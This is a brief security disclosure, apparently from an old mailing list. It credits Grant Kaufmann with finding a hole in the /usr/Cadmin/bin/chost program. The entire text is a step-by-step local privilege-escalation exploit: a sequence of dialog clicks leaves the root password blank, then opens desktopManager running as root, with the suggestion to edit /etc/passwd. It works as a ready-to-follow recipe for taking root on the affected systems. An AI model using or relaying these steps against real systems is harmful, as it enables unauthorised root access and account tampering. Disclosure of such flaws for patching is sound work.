Grant  Kaufmann  found  vulnerability  in  chost  program and made
 exploit.  Here it goes.

    /usr/Cadmin/bin/chost
    tools-primary user information
    change information
    OK (to root password, ie leave blank)
    OK (to "password invalid")
    Cancel
    Double-click any share resource to bring up desktopManager
    running as root. Try editing /etc/passwd